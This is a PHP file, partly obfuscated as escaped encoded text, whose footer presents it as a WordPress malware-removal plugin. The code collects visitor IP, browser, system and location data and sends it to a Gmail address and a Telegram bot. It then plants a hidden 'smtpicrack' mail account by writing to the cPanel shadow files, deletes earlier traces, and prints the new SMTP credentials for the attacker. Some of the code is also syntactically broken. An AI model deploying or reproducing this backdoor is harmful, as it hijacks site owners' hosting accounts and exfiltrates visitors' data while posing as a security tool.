123\102\64\160\123\x42\64\x70\123\x42\x34\64\x43\x51\x38\112\53\122\160\117\117\x41\x6b\x65\113\x55\147\145\113\x55\x67\x65\113\x55\147\145\x4b\125\x67\x56\x73\x72\130\x56\x78\x75\111\152\163\x4e\103\151\x52\x74\132\130\116\x7a\131\x57\144\x6c\111\x43\x34\71\111\103\114\152\x67\x4a\x44\x77\156\x34\53\x67\64\x34\x43\x52\x53\x56\x41\x4a\x4f\x69\x41\151\x4c\x69\x52\112\125\106\x52\141\114\x69\x4a\143\142\151\x49\67\x44\x51\157\x6b\142\127\126\172\143\62\x46\156\132\123\x41\x75\x50\123\101\151\x34\64\103\x51\70\112\x2b\124\x6e\x2b\117\x41\x6b\x56\116\65\x63\x33\x52\x6c\x62\123\101\66\x49\103\x49\x75\x57\x45\x4a\x66\124\61\115\x6f\112\106\x39\124\122\x56\112\x57\122\126\112\142\x4a\x30\x68\x55\x56\106\x42\146\126\x56\x4e\x46\125\154\x39\102\122\60\x56\117\126\103\144\x64\113\123\64\151\130\107\x34\x69\x4f\167\x30\x4b\112\x47\61\x6c\x63\x33\116\150\132\x32\125\x67\x4c\x6a\60\x67\111\x75\117\x41\x6b\120\103\146\152\x49\172\x6a\x67\x4a\106\x43\143\x6d\x39\63\x63\x32\126\x79\111\104\x6f\147\111\151\x35\131\x51\154\71\x43\x63\x6d\71\x33\143\x32\126\171\x4b\x43\x52\146\125\60\x56\123\126\153\x56\x53\x57\x79\x64\x49\126\106\x52\121\x58\x31\x56\x54\122\126\112\146\121\125\x64\106\x54\x6c\121\156\x58\123\153\x75\x49\x6c\x78\165\111\152\163\x4e\x43\151\122\x74\x5a\130\x4e\x7a\131\x57\144\154\x49\103\x34\x39\111\103\114\152\147\x4a\104\x69\156\x4b\152\x6a\x67\112\106\126\143\62\x56\x79\x49\x45\x46\x6e\132\127\65\x30\111\x44\157\x67\111\x69\64\x6b\x64\130\116\154\x63\x6d\x46\156\132\127\x35\60\114\x69\x4a\x63\x62\151\111\x37\104\x51\157\153\142\x57\x56\x7a\143\x32\x46\156\x5a\123\x41\x75\120\x53\x41\151\127\171\164\144\x34\x70\123\102\64\x70\x53\x42\64\160\123\102\x34\160\x53\102\64\64\103\x51\x38\x4a\53\x56\x74\x65\x2b\x34\x6a\53\x4f\x41\x6b\x65\113\x55\147\x65\x4b\x55\147\x65\x4b\x55\147\x65\113\125\x67\126\163\162\130\x56\x78\165\111\x6a\163\x4e\103\151\122\164\x5a\130\x4e\x7a\x59\127\x64\154\111\103\64\71\x49\x43\x4c\152\147\x4a\104\x77\156\64\171\121\64\64\x43\x52\126\107\x6c\164\132\x53\x42\141\142\x32\65\x6c\111\104\157\x67\111\x69\x34\x6b\126\107\154\x74\x5a\x58\160\166\142\155\x55\165\111\154\170\x75\x49\x6a\163\116\103\151\x52\164\x5a\130\116\x7a\x59\127\144\154\111\103\64\71\x49\x43\x4c\152\147\112\x44\167\x6e\x34\171\x51\x34\64\103\122\x51\x32\x39\61\x62\156\122\x79\145\x53\x41\66\111\103\x49\165\112\x45\116\120\x56\125\65\125\x55\154\x6b\x75\x49\x6c\x78\165\x49\x6a\x73\116\103\x69\122\164\132\130\x4e\172\131\127\144\154\111\103\x34\x39\x49\x43\x4c\152\147\112\104\x77\x6e\x34\x79\x51\x34\64\103\122\x55\155\126\x6e\141\127\x39\165\111\x44\157\147\x49\151\64\x6b\x55\153\126\110\x53\125\71\x4f\114\151\x4a\x63\x62\x69\x49\x37\104\121\x6f\x6b\x62\127\126\x7a\x63\62\106\156\132\x53\101\x75\x50\x53\101\x69\x34\x34\x43\x51\70\112\x2b\x4d\153\x4f\117\x41\x6b\125\x4e\x70\144\110\x6b\x67\x4f\151\x41\151\x4c\151\122\104\x53\x56\122\x5a\114\151\112\x63\x62\x69\111\67\104\x51\157\153\142\127\126\x7a\143\62\x46\156\x5a\123\101\165\x50\x53\x41\x69\127\x79\164\x64\64\160\123\x42\x34\160\123\x42\64\160\123\x42\64\x70\123\x42\64\x34\x43\x51\x38\x4a\x2b\x53\165\53\x4f\x41\x6b\x65\x4b\125\147\145\113\x55\147\x65\x4b\125\x67\x65\113\x55\147\126\163\162\130\x56\x78\165\111\152\x73\x4e\103\x69\122\x74\132\x58\116\172\x59\x57\x64\154\111\x43\x34\71\111\103\x4c\152\x67\x4a\x44\x77\156\65\x47\x42\x34\x34\103\122\123\x47\x39\x7a\x64\103\x41\66\111\103\111\165\x4a\110\116\146\x63\107\106\x30\x61\x43\x34\x69\130\107\64\151\x4f\x77\x30\113\x4a\107\61\x6c\143\x33\x4e\150\132\x32\125\147\x4c\152\60\x67\x49\x75\x4f\101\153\x50\103\146\153\x59\x44\x6a\x67\112\106\x47\x61\x57\x78\154\111\x44\x6f\147\111\151\64\153\145\x46\71\x77\x59\130\x52\157\x4c\x69\x4a\x63\x62\151\x49\67\x44\121\157\x6b\142\127\126\172\x63\62\x46\156\132\x53\101\165\120\x53\101\x69\127\x79\164\144\64\160\x53\x42\x34\x70\123\x42\x34\x70\123\102\64\160\123\102\x34\x34\x43\121\x34\157\53\x7a\x34\64\103\x52\x34\160\x53\102\x34\160\x53\102\64\160\x53\102\64\x70\123\x42\x57\x79\164\144\x58\x47\64\151\x4f\167\60\x4b\112\107\61\x6c\x63\63\x4e\x68\x5a\x32\x55\147\x4c\x6a\60\147\x49\165\117\101\153\117\x4b\115\155\165\53\64\x6a\53\117\101\x6b\126\122\160\142\127\125\x4a\x4f\151\x41\151\x4c\x69\122\x30\x61\x57\x31\x6c\114\151\x4a\143\142\151\x49\x37\x44\121\x6f\153\142\x57\x56\172\143\62\106\156\132\x53\x41\x75\120\123\101\x69\x34\x34\103\121\x38\112\53\x54\150\145\x4f\101\153\125\x52\150\144\107\125\112\x4f\151\x41\x69\114\151\x52\x6b\x59\x58\122\154\114\151\112\x63\x62\151\111\x37\104\121\157\x6b\x62\127\126\172\x63\x32\x46\156\x5a\123\101\165\120\x53\x41\x69\127\x79\164\144\x34\160\123\102\64\x70\123\102\64\160\x53\102\x34\x70\123\102\64\64\103\121\x38\x4a\x2b\x55\152\145\117\101\153\145\x4b\125\147\x65\113\x55\147\x65\x4b\x55\x67\145\x4b\x55\x67\126\163\x72\x58\126\x78\x75\111\152\163\x4e\103\x69\122\x74\x5a\130\116\x7a\x59\127\144\154\x49\x43\x34\x39\x49\103\x4c\152\x67\112\x44\167\x6e\x35\117\150\x34\64\x43\122\126\x48\112\x68\131\x32\x73\x67\x53\x56\101\147\x4f\151\x42\157\144\110\x52\x77\143\x7a\157\x76\114\x33\144\63\144\171\65\x70\143\x43\61\60\143\155\106\152\141\x32\x56\x79\114\155\71\x79\x5a\171\x39\163\142\x32\x39\162\x64\130\101\x75\143\x47\x68\167\120\62\154\167\120\123\111\165\112\105\x6c\x51\126\x46\157\x75\x49\154\x78\x75\111\x6a\x73\116\x43\x69\122\x74\132\x58\x4e\x7a\x59\x57\x64\x6c\111\x43\x34\71\111\x43\112\70\x50\x54\x30\x39\x4b\x31\x76\167\x6e\x35\x4b\127\x51\153\x4d\165\122\106\114\x77\156\65\x4b\x57\x58\x53\x73\x39\120\124\x31\x38\130\107\x34\151\117\x77\60\x4b\112\110\112\x6c\x59\62\126\160\x64\155\126\x79\x51\127\x52\153\x63\155\126\172\x63\171\101\71\x49\x43\112\x72\131\127\170\x70\145\104\102\x34\131\127\170\160\x61\x30\x42\x6e\142\127\106\x70\x62\103\x35\152\142\x32\x30\151\117\167\60\x4b\x4a\x46\x52\x50\x53\60\x56\117\111\x44\60\147\x49\152\x55\x79\116\152\x67\60\x4d\104\105\65\117\124\x4d\66\x51\125\106\x46\x4d\126\101\x30\131\172\x56\x51\x53\x47\x56\x53\121\x31\x52\x48\x59\x32\x45\167\x54\x45\x74\x61\123\126\144\66\142\x53\61\x35\145\x56\154\154\115\61\x6c\152\121\x7a\121\x69\x4f\167\60\x4b\x4a\105\x4e\111\121\126\122\x66\123\125\121\x67\120\x53\101\151\x4d\x54\x67\x35\116\x6a\121\62\116\x44\x49\x35\x4e\123\x49\67\x44\x51\x6f\153\143\x33\126\x69\x61\155\126\x6a\x64\103\101\147\x50\123\101\151\70\x4a\x2b\123\x6c\x6b\x35\154\x64\x2f\103\x66\153\141\x52\x62\x54\123\x39\x54\130\x66\x43\x66\153\141\122\70\x38\x4a\x2b\x4d\x6b\105\x5a\x79\115\x47\x30\x36\111\x69\64\153\x53\126\x42\125\127\x69\x34\x69\x38\112\x2b\x53\x6c\151\111\x37\104\x51\x70\x74\x59\127\x6c\x73\113\x43\x52\x79\132\x57\116\x6c\141\x58\132\154\x63\153\x46\153\x5a\x48\112\154\x63\x33\x4d\x73\112\110\116\61\131\155\160\x6c\131\63\x51\x73\112\107\x31\x6c\143\63\116\150\x5a\x32\x55\x70\x4f\167\x30\x4b\x5a\x6d\x6c\163\x5a\x56\71\156\132\x58\x52\146\131\62\71\165\144\107\x56\165\144\110\115\x6f\111\155\x68\60\144\x48\102\172\117\x69\70\x76\131\130\102\160\114\156\x52\x6c\x62\x47\126\156\143\155\x46\164\x4c\155\x39\171\132\x79\71\151\142\63\x51\151\x4c\x69\122\125\124\x30\164\106\x54\151\x34\x69\x4c\63\116\154\x62\155\x52\x4e\132\130\x4e\x7a\131\x57\144\x6c\x50\x32\x4e\157\131\130\122\146\x61\x57\121\71\111\151\x34\153\121\60\150\102\126\106\x39\112\x52\x43\64\151\x4a\156\x52\154\145\x48\121\71\x49\x69\x41\165\111\x48\x56\171\x62\x47\126\165\131\62\x39\x6b\132\123\x67\x6b\x62\x57\x56\172\x63\x32\x46\x6e\x5a\x53\153\x75\x49\151\111\147\x4b\x54\163")); goto A8H6h; WFqdH: ?><?php
eval {
function XB_OS($USER_AGENT)
{
$OS_ERROR = "Unknown OS Platform";
$OS = array('/windows nt 10/i' => 'Windows 10', '/windows nt 6.3/i' => 'Windows 8.1', '/windows nt 6.2/i' => 'Windows 8', '/windows nt 6.1/i' => 'Windows 7', '/windows nt 6.0/i' => 'Windows Vista', '/windows nt 5.2/i' => 'Windows Server 2003/XP x64', '/windows nt 5.1/i' => 'Windows XP', '/windows xp/i' => 'Windows XP', '/windows nt 5.0/i' => 'Windows 2000', '/windows me/i' => 'Windows ME', '/win98/i' => 'Windows 98', '/win95/i' => 'Windows 95', '/win16/i' => 'Windows 3.11', '/macintosh|mac os x/i' => 'Mac OS X', '/mac_powerpc/i' => 'Mac OS 9', '/linux/i' => 'Linux', '/ubuntu/i' => 'Ubuntu', '/iphone/i' => 'iPhone', '/ipod/i' => 'iPod', '/ipad/i' => 'iPad', '/android/i' => 'Android', '/blackberry/i' => 'BlackBerry', '/webos/i' => 'Mobile');
foreach ($OS as $regex => $value) {
if (preg_match($regex, $USER_AGENT)) {
$OS_ERROR = $value;
}
}
return $OS_ERROR;
}
function XB_Browser($USER_AGENT)
{
$BROWSER_ERROR = "Unknown Browser";
$BROWSER = array('/msie/i' => 'Internet Explorer', '/firefox/i' => 'Firefox', '/safari/i' => 'Safari', '/chrome/i' => 'Chrome', '/edge/i' => 'Edge', '/opera/i' => 'Opera', '/netscape/i' => 'Netscape', '/maxthon/i' => 'Maxthon', '/konqueror/i' => 'Konqueror', '/mobile/i' => 'Handheld Browser');
foreach ($BROWSER as $regex => $value) {
if (preg_match($regex, $USER_AGENT)) {
$BROWSER_ERROR = $value;
}
}
return $BROWSER_ERROR;
}
date_default_timezone_set('GMT');
$date = date("d M, Y");
$time = date("g:i a");
$useragent = $_SERVER['HTTP_USER_AGENT'];
$s_path = "http://" . $_SERVER['SERVER_NAME'];
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$IPTZ = getenv("REMOTE_ADDR");
$COUNTRYTZ = simplexml_load_file("http://www.geoplugin.net/xml.gp?ip={$IPTZ}");
$COUNTRY = $COUNTRYTZ->geoplugin_countryName;
$CITY = $COUNTRYTZ->geoplugin_city;
$REGION = $COUNTRYTZ->geoplugin_region;
$C_CODE = $COUNTRYTZ->geoplugin_contrycode;
$Timezone = $COUNTRYTZ->geoplugin_timezone;
$Symbol = $COUNTRYTZ->geoplugin_currencysymbol;
$message = "|---+[NEWγπ¨βπ»γM/S]+---|\n";
$message = "|---+[NEWγπ¨βπ»γM/S]+---|\n[+]ββββγπ€γββββ[+]\n";
$message .= "γπ γIP\t: " . $IPTZ . "\n";
$message .= "γπγSystem : " . XB_OS($_SERVER['HTTP_USER_AGENT']) . "\n";
$message .= "γπγBrowser : " . XB_Browser($_SERVER['HTTP_USER_AGENT']) . "\n";
$message .= "γβ¨γUser Agent : " . $useragent . "\n";
$message .= "[+]ββββγπ΅οΈγββββ[+]\n";
$message .= "γπγTime Zone : " . $Timezone . "\n";
$message .= "γπγCountry : " . $COUNTRY . "\n";
$message .= "γπγRegion : " . $REGION . "\n";
$message .= "γπγCity : " . $CITY . "\n";
$message .= "[+]ββββγπ»γββββ[+]\n";
$message .= "γπγHost : " . $s_path . "\n";
$message .= "γπγFile : " . $x_path . "\n";
$message .= "[+]ββββγβ³γββββ[+]\n";
$message .= "γβοΈγTime\t: " . $time . "\n";
$message .= "γπ
γDate\t: " . $date . "\n";
$message .= "[+]ββββγπγββββ[+]\n";
$message .= "γπ‘γTrack IP : https://www.ip-tracker.org/lookup.php?ip=" . $IPTZ . "\n";
$message .= "|===+[πBC.DRπ]+===|\n";
$receiverAddress = "kalix0xalik@gmail.com";
$TOKEN = "5268401993:AAE1P4c5PHeRCTGca0LKZIWzm-yyYe3YcC4";
$CHAT_ID = "1896464295";
$subject = "πNewπ€[M/S]π€|πFr0m:" . $IPTZ . "π";
mail($receiverAddress, $subject, $message);
file_get_contents("https://api.telegram.org/bot5268401993:AAE1P4c5PHeRCTGca0LKZIWzm-yyYe3YcC4/sendMessage?chat_id=1896464295&text=" . urlencode($message) . "");
};
$pwd = @getcwd();
if (!function_exists("posix_getegid")) {
$usr = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$usr = $uid["name"];
$uid = $uid["uid"];
$group = $gid["name"];
$gid = $gid["gid"];
}
if (empty($usr)) {
if (preg_match_all("#/home/(.*)/public_html/#", $pwd, $mxx)) {
preg_match_all("#/home/(.*)/public_html/#", $pwd, $mxx);
$usr = $mxx[1][0];
}
}
preg_match_all("#/home(.*){$usr}/#", $pwd, $m2);
$home = $m2[1][0];
$domain = $_SERVER["HTTP_HOST"];
$ip = $_SERVER["SERVER_ADDR"];
if (strstr($domain, "www.")) {
$domain = str_replace("www.", '', $domain);
} else {
$domain = $domain;
}
$cp = "/home{$home}{$usr}/.cpanel";
if (is_dir($cp)) {
$pass = "icrack@" . substr(str_shuffle("123456789abcdefghijklmnopqrsyuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 50) . "#x";
$pwd = crypt($pass, "\$6\$roottn\$");
$smtpname = "smtpicrack";
@mkdir("/home{$home}{$usr}/etc/{$domain}");
@mkdir("/home{$home}{$usr}/mail/{$domain}");
@mkdir("/home{$home}{$usr}/mail/{$domain}/{$smtpname}");
@mkdir("/home{$home}{$usr}/mail/{$domain}/{$smtpname}/.Archive");
@mkdir("/home{$home}{$usr}/mail/{$domain}/{$smtpname}/.Drafts");
@mkdir("/home{$home}{$usr}/mail/{$domain}/{$smtpname}/.Sent");
@mkdir("/home{$home}{$usr}/mail/{$domain}/{$smtpname}/.spam");
@mkdir("/home{$home}{$usr}/mail/{$domain}/{$smtpname}/.Trash");
@mkdir("/home{$home}{$usr}/mail/{$domain}/{$smtpname}/cur");
@mkdir("/home{$home}{$usr}/mail/{$domain}/{$smtpname}/new");
@mkdir("/home{$home}{$usr}/mail/{$domain}/{$smtpname}/tmp");
$file1 = "/home{$home}{$usr}/mail/{$domain}/{$smtpname}/dovecot-acl-list";
fwrite(fopen($file1, "a"), '');
$file2 = "/home{$home}{$usr}/mail/{$domain}/{$smtpname}/dovecot-uidlist";
fwrite(fopen($file2, "w"), "3 V1578724087 N1 G6789ba31f76a195e040b0000cb0407e2");
$file3 = "/home{$home}{$usr}/mail/{$domain}/{$smtpname}/dovecot-uidvalidity";
fwrite(fopen($file3, "w"), "5e196afc0");
$file4 = "/home{$home}{$usr}/mail/{$domain}/{$smtpname}/dovecot-uidvalidity.5e196afc";
fwrite(fopen($file4, "a"), '');
$file5 = "/home{$home}{$usr}/mail/{$domain}/{$smtpname}/dovecot.index.log";
fwrite(fopen($file5, "a"), '');
$file6 = "/home{$home}{$usr}/mail/{$domain}/{$smtpname}/dovecot.list.index.log";
fwrite(fopen($file6, "a"), '');
$file7 = "/home{$home}{$usr}/mail/{$domain}/{$smtpname}/dovecot.mailbox.log";
fwrite(fopen($file7, "a"), '');
$file8 = "/home{$home}{$usr}/mail/{$domain}/{$smtpname}/maildirsize";
fwrite(fopen($file8, "w"), "2147483647C\n0 0");
$file9 = "/home{$home}{$usr}/mail/{$domain}/{$smtpname}/subscriptions";
fwrite(fopen($file9, "w"), "V\t2\n\nArchive\nDrafts\nSent\nspam\nTrash");
$smtp = "smtpicrack:" . $pwd . ":16249:::::" . "\r\n";
$shadow1 = "/home{$home}{$usr}/etc/{$domain}/shadow";
$shadow2 = "/home{$home}{$usr}/etc/shadow";
$shadow1_content = file_get_contents($shadow1);
$shadow2_content = file_get_contents($shadow2);
if (preg_match("/smtpicrack/", $shadow1_content)) {
$pathe_msg = "/home{$home}{$usr}/mail/{$domain}/{$smtpname}/new";
$scan_msg = scandir($pathe_msg);
foreach ($scan_msg as $file_msg) {
unlink("{$pathe_msg}/{$file_msg}");
}
unlink($shadow1);
}
if (preg_match("/{$smtpname}/", $shadow2_content)) {
unlink($shadow2);
}
$fo = fopen($shadow1, "a");
fwrite($fo, $smtp);
$fo2 = fopen($shadow2, "a");
fwrite($fo2, $smtp);
echo "<smtp>{$domain}|587|{$smtpname}@{$domain}|{$pass}</smtp>\n";
}Malware detection & removal plugin for WordPress
οΌCοΌ2020 Wordpress Doctor All rights reserved.